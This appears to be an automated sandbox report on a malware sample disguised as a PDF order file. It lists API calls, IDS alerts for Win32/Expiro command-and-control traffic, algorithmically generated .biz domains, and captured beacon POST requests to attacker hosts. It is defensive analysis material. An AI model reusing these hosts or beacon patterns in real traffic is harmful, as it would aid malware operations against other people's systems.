Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00446CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00446CA9
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_004460DD
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_004463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_004463F9
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0044F56F FindFirstFileW,FindClose,	0_2_0044F56F
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0044F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0044F5FA
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0044EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0044EB60
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00451B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451B2F
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00451C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00451C8A
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00451F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00451F94

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 4x nop then jmp 02A37394h	11_2_02A37188
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 4x nop then jmp 02A378DCh	11_2_02A37688
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	11_2_02A37E60
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 4x nop then jmp 02A378DCh	11_2_02A3767A
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	11_2_02A37E5E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49753 -> 82.112.184.197:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49730 -> 54.244.188.177:80
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:53257 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:54346 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49900 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49931 -> 18.246.231.120:80
Source: Network traffic	Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.4:63363 -> 1.1.1.1:53

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Yara detected Generic Downloader

Source: Yara match	File source: 9.2.RegSvcs.exe.381ebc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3890010.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.38575f0.5.raw.unpack, type: UNPACKEDPE

Source: unknown

Network traffic detected: DNS query count 69

Source: global traffic

TCP traffic: 192.168.2.4:49738 -> 51.195.88.199:587

Source: global traffic

HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49860
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49860
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49904
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49904
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.4:49896
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.4:49896
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:49910
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:49910
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.4:49915
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.4:49915
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.4:49890
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.4:49890
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.4:49950
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.4:49950
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.4:49909
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.4:49909

Source: global traffic

TCP traffic: 192.168.2.4:49738 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /tbqsdcfeojy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 856
Source: global traffic	HTTP traffic detected: POST /hofte HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hfbsoyybcej HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
Source: global traffic	HTTP traffic detected: POST /qwhxdc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /hn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /cvmmqsiwgd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bgeqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rmpctvmhvfmcakj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dss HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wblsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /lmjmtfvnnmvba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /chev HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /abs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /smway HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /cnuoabdloqrfy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /woygorb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qcekrwvgvvohof HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wrtcay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fffkga HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hebjmwuaims HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lrhpwoxhabbo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /do HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rioahhbhdoogcd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vfyfu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qborytaxfey HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nrq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /douphuxkjsfcbawq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xfxdrndh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vnerdykqwl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /acnoqimrskbkvnwq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dxskhpn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mghrypnodi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /knkyl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xkeryphtb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jbjdkjesppdqiqdm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uqsaxr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lir HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /funk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
